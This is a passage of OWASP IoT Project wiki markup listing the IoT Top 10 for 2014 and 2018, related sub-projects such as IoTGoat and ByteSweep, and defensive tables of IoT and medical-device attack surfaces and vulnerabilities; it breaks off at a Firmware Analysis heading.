* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is one-to-one; where no exact match exists, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by the [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project OWASP Internet of Things Project]. IoTGoat is expected to be released by December 2019.<br />
<br />
To get more information on getting started or how to contribute, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. The platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static key for encryption and decryption<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Desoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, an attacker can modify the execution of the firmware on the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, an attacker can obtain full console access to a device<br />
* Typical security measures include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
